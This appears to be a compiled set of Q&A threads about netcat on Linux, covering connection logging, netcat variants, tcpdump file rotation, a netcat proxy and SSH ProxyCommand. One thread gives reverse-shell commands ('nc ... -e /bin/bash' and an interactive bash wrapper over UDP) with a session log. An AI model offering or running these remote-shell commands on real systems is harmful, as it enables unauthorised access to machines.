unix netcat utility on linux, checking if connection was made - linux

I am using the netcat utility on Linux to receive outputs from a program on a Windows machine. My problem is that the program on the Windows machine does not always give an output.
How can I check whether a connection has been made to netcat?
What I am doing till now is "nc -l -v 9103 > output", then I check the size of output. The problem this poses is that netcat only writes to a file after a certain buffer size has been reached or a newline char is encountered, so in some cases even though a connection has been made the file size is detected as zero.
How can I check if someone has made a connection with netcat?
I tried using
nc -l -v -e someprog.exe 9103 > output
but my netcat doesn't seem to support this.
Below are the options I have:
$ nc -h
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-p port Specify local port for remote connects
-r Randomize remote ports
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]

Verbose mode will write connectivity to stderr, and you can redirect stderr to a file; the verbose log has something like
connect to [xxx] from [xxxx]
Try
nc -l -v -p 9103 -k 1> output 2>connect.log
and monitor connect.log for connectivity.
If you don't use -k, netcat quits after the 1st connection.
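If you would rather record the connection event itself than infer it from the size of the output file, the following Python listener is an added example (not from the question or either answer): it logs every accepted connection as soon as accept() returns, including a peer that sends nothing or sends data without a newline. The port is chosen by the OS and the two peers in demo() are constructed.

```python
# Added example, not from the original question or answers: a TCP listener
# that logs each connection when accept() returns, whether or not the peer
# ever sends a byte, so it does not suffer from the "empty until a newline
# or a full buffer arrives" behaviour of `nc ... > output`.
import socket
import threading
from datetime import datetime, timezone


def record_connections(srv, max_conns=1, idle_timeout=2.0, log=None):
    """Accept up to max_conns connections on a listening socket and return
    [(utc_stamp, peer, nbytes)]. Each event is appended (and written to `log`,
    flushed) as soon as the connection closes or goes idle, so a monitor sees
    it even when nbytes is 0 or the data carries no newline."""
    events = []
    srv.settimeout(idle_timeout)              # stop waiting if nobody else connects
    while len(events) < max_conns:
        try:
            conn, peer = srv.accept()
        except socket.timeout:
            break
        stamp = datetime.now(timezone.utc).isoformat()
        data = b""
        with conn:
            conn.settimeout(idle_timeout)
            try:
                while chunk := conn.recv(4096):
                    data += chunk
            except socket.timeout:
                pass                          # peer went quiet without closing
        events.append((stamp, peer, len(data)))
        if log is not None:
            log.write(f"{stamp} connect from {peer[0]}:{peer[1]} bytes={len(data)}\n")
            log.flush()
    return events


def demo(host="127.0.0.1"):
    """Two constructed peers: one sends nothing, one sends data with no newline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))                       # port 0: let the OS pick a free port
    srv.listen(5)
    events = []
    worker = threading.Thread(target=lambda: events.extend(record_connections(srv, 2)))
    worker.start()
    with socket.create_connection(srv.getsockname()):
        pass                                  # connect, send nothing, close
    with socket.create_connection(srv.getsockname()) as c:
        c.sendall(b"partial")                 # no newline: nc > file would buffer this
    worker.join()
    srv.close()
    return events                             # two events with byte counts 0 and 7
```

Pass an open file as `log` to get a connect.log that can be tailed, like the stderr redirect above, but with a line per connection regardless of what the peer sends.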

If you can upgrade your copy of netcat: the modern versions (1.10, for one) have an option to execute a program (or a shell command) upon connect. Otherwise, you can make netcat think it runs in a terminal (to disable buffering of stdout) by using, for example, script (it just saves everything on stdin/stdout/stderr in the given file). Or use the logging features of screen and tmux.

Related

netcat command option difference between ubuntu 20.04.01 and it compiled from source code

The netcat command installed on Ubuntu 20.04.01 by default has the -X option, but netcat 0.7.1 compiled from source code does not have the -X option. What is the difference?
netcat installed on Ubuntu 20.04.01:
foo@foo:~/data/tmp$ netcat --help
netcat: invalid option -- '-'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
netcat 0.7.1 compiled from the source code:
foo@foo:~/data/tmp$ ./netcat/bin/netcat --help
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere: ./netcat/bin/netcat [options] hostname port [port] ...
listen for inbound: ./netcat/bin/netcat -l -p port [options] [hostname] [port] ...
tunnel to somewhere: ./netcat/bin/netcat -L hostname:port -p port [options]
Mandatory arguments to long options are mandatory for short options too.
Options:
-c, --close close connection on EOF from stdin
-e, --exec=PROGRAM program to exec after connect
-g, --gateway=LIST source-routing hop point[s], up to 8
-G, --pointer=NUM source-routing pointer: 4, 8, 12, ...
-h, --help display this help and exit
-i, --interval=SECS delay interval for lines sent, ports scanned
-l, --listen listen mode, for inbound connects
-L, --tunnel=ADDRESS:PORT forward local port to remote address
-n, --dont-resolve numeric-only IP addresses, no DNS
-o, --output=FILE output hexdump traffic to FILE (implies -x)
-p, --local-port=NUM local port number
-r, --randomize randomize local and remote ports
-s, --source=ADDRESS local source address (ip or hostname)
-t, --tcp TCP mode (default)
-T, --telnet answer using TELNET negotiation
-u, --udp UDP mode
-v, --verbose verbose (use twice to be more verbose)
-V, --version output version information and exit
-x, --hexdump hexdump incoming and outgoing traffic
-w, --wait=SECS timeout for connects and final net reads
-z, --zero zero-I/O mode (used for scanning)
Remote port number can also be specified as range. Example: '1-1024'
The netcat from Ubuntu is the OpenBSD one:
$ netcat -help
OpenBSD netcat (Debian patchlevel 1.206-1ubuntu1)
And you compiled the GNU version:
$ ./netcat/bin/netcat --help
GNU netcat 0.7.1, a rewrite of the famous networking tool.
This post discusses the differences between both.

Writing a linux script for tcpdump for stopping and running again but save the info in another file

I am new to writing scripts and not sure whether I am correct in writing such a script for tcpdump to collect pcap info.
tcpdump -s 0 port ftp or ssh or http or https -i eth0 -w mycap.pcap
#run the tcpdump and store all the info in mycap.pcap
sudo kill -2 #for exit purpose
This enables me to run tcpdump, which is good; however, I wish to stop this automatically via the same script (once mycap.pcap reaches the max capacity of 3GB per file) and run again, but this time round I will store it in another file (e.g. mycap1.pcap).
Then the cycle goes again until I stop the process by pressing Ctrl+C.
Can this be done?
You don't need to write a script for that.
tcpdump -C <filesize> -s 0 port ftp or ssh or http or https -i eth0 -w mycap.pcap
Have a look at the man-page for tcpdump.

Reverse shell using netcat and UDP is not working

I'm trying to set up a reverse shell between two Linux machines (Kali v. 1.0.9), using the default installation of netcat.
Using the commands below, I was able to make a connection and relay text information between the two machines:
Listener:
nc -luvvp <port>
Client:
nc -uvv <ip> <port>
However, modifying the client's arguments to include executing bash upon a connection:
nc -uvv <ip> <port> -e /bin/bash
And no connection is made. I'm not quite sure how to get this to work; this doesn't seem to be a problem that other people have experienced, and I was unsure of how to solve the issue. It might also help to know that these commands work fine using the normal TCP mode; it's only after adding the u flag that it stops working for shells. Any help would be appreciated, thanks!
I did some experiments and realized that tunneling a shell session via netcat over UDP is almost impossible. Bash does not know that the underlying file descriptor is a UDP socket; bash calls read() with buffer size 1. That is fine for an interactive shell, but when the received UDP datagram contains more than 1 byte then data is lost (except the first byte in the datagram).
Netcat uses the standard line buffer at stdin and the whole line is sent in a single UDP datagram. But bash reads only the first byte from each line.
The other problem is that the client netcat executed via the command
nc -uvv -e "/bin/bash" <ip> <port>
does not send any data to the server because bash is executed in non-interactive mode and it just waits for a command. The solution is to write a script to execute bash in interactive mode:
$ cat bashinteractive
#!/bin/bash
/bin/bash -i
and call the server
$ nc -luvvp <port>
and the client
nc -uvv -e "./bashinteractive" <ip> <port>
But the usage is very inconvenient. It is possible to write a command on the server when each byte is followed by ENTER:
$ ./nc -luvvp 6666
listening on [any] 6666 ...
connect to [10.0.2.15] from xxx.yyy.zzz [10.0.2.16] 37552
$ c
cd
d
/
/
$ l
ls
s
-
-l
l
total 92
drwxr-xr-x 2 root root 4096 Feb 7 15:22 bin
....
drwxr-xr-x 13 root root 4096 Oct 16 2013 var
$ e
ex
xi
it
t
exit
sent 30, rcvd 1422 : Connection refused
So my recommendation is to use another tool than netcat. Perhaps you can try
http://code.google.com/p/udptunnel/
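The 1-byte read() behaviour this answer describes can be reproduced without netcat or bash. The Python example below is added here and is not from the answer: it sends one constructed line as a single UDP datagram and reads it one byte at a time, then does the same over a TCP stream for comparison, so the loss is visible as a return value rather than a garbled session.

```python
# Added example, not from the original answer: reproduce the datagram
# semantics behind the lost bytes. UDP is message-oriented: a read with a
# 1-byte buffer returns the first byte of the datagram and the kernel discards
# the rest. TCP is a byte stream: the same 1-byte reads recover everything.
import socket

PAYLOAD = b"ls -l\n"   # constructed: one line, as netcat sends it in one datagram


def read_one_byte_at_a_time(sock, timeout=0.5):
    """Mimic a reader that calls read() with a 1-byte buffer until no data is left."""
    sock.settimeout(timeout)
    out = b""
    try:
        while chunk := sock.recv(1):           # b"" means the TCP peer closed
            out += chunk
    except socket.timeout:
        pass                                   # nothing more pending (UDP case)
    return out


def udp_one_byte_reads(payload=PAYLOAD):
    """Send payload as ONE datagram; return (what is queued, what 1-byte reads get)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as rx, \
         socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as tx:
        rx.bind(("127.0.0.1", 0))
        rx.settimeout(1.0)
        tx.sendto(payload, rx.getsockname())
        queued = rx.recv(65535, socket.MSG_PEEK)   # whole datagram is waiting...
        got = read_one_byte_at_a_time(rx)          # ...but only its first byte survives
        return queued, got                         # -> (b"ls -l\n", b"l")


def tcp_one_byte_reads(payload=PAYLOAD):
    """Same payload over a TCP stream: 1-byte reads recover all of it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        with socket.create_connection(srv.getsockname()) as tx:
            rx, _ = srv.accept()
            with rx:
                tx.sendall(payload)
                tx.shutdown(socket.SHUT_WR)        # EOF so the reader sees b""
                return read_one_byte_at_a_time(rx) # -> b"ls -l\n"
```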

netcat proxy shell issue on linux

I am trying to follow a number of recipes which use netcat or ideally knc (Kerberos netcat) to create a proxy, either to look at what is being piped through the proxy for debugging or to create a Kerberos-authenticated link over which I can tunnel some Java-based TCP server-to-server traffic.
Taking this example http://notes.tweakblogs.net/blog/7955/using-netcat-to-build-a-simple-tcp-proxy-in-linux.html, the pattern seems to be something like:
mkfifo fifo
nc -l -p 8080 <fifo | nc tweakers.net 80 >fifo
Yet that gives the error:
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
[-x proxy_address[:port]] [hostname] [port[s]]
Yet if I run either side of the pipe alone I get no error:
nc -l -p 8080 <fifo
nc tweakers.net 80 >fifo
What am I missing to get this to work?
I am running Red Hat Enterprise Linux Server release 6.2 (Santiago), with either bash or ksh.
Annoyingly it was the -p option which was tripping things up. The following command runs fine:
nc -l 8080 <fifo | nc somehost.com 80 >fifo
Then in another shell doing
telnet localhost 8080
get /
works fine.

How to purge connections left open by SSH ProxyCommand?

I have a webserver WWW1 and a front-facing proxy PRX. I use SSH ProxyCommand to connect to WWW1's internal IP (private IP) via PRX (private+public IP). For some connections (not all) I see a network connection left open after I'm finished. These add up!
~/.ssh/config
Host *
ServerAliveInterval 5
ControlMaster auto
ControlPath ~/.ssh/master-%r@%h:%p
Host WWW1 WWW2 WWW3
User foo
ProxyCommand ssh -q -a -x PRX nc %h 22
IdentityFile ~/.ssh/id_foo_WWWx
On PRX, lsof | grep WWW1:ssh shows 124 open connections at the moment. On WWW1, the same command shows 243 open connections. There are similar open connections for WWW2, WWW3 etc.
WWW1 and PRX are Debian. Client connections are coming from a mix of Debian, Ubuntu and OS X 10.6. I use Emacs Tramp, but this has no special configuration (AFAIK) outside of my ~/.ssh/config.
I'm concerned about running out of internal ports, and ideally I want these connections to clean themselves up without intervention. Ideally by configuring them to kill themselves off; failing that a command I can kill old processes with is fine!
A better way would be to use the -W option of SSH, so you could put
ProxyCommand ssh -q -a -x PRX -W %h:22
instead of
ProxyCommand ssh -q -a -x PRX nc %h 22
This way you get rid of the dependence on nc too.
Don't know whether it matters, but I use nc -w 1 %h %p
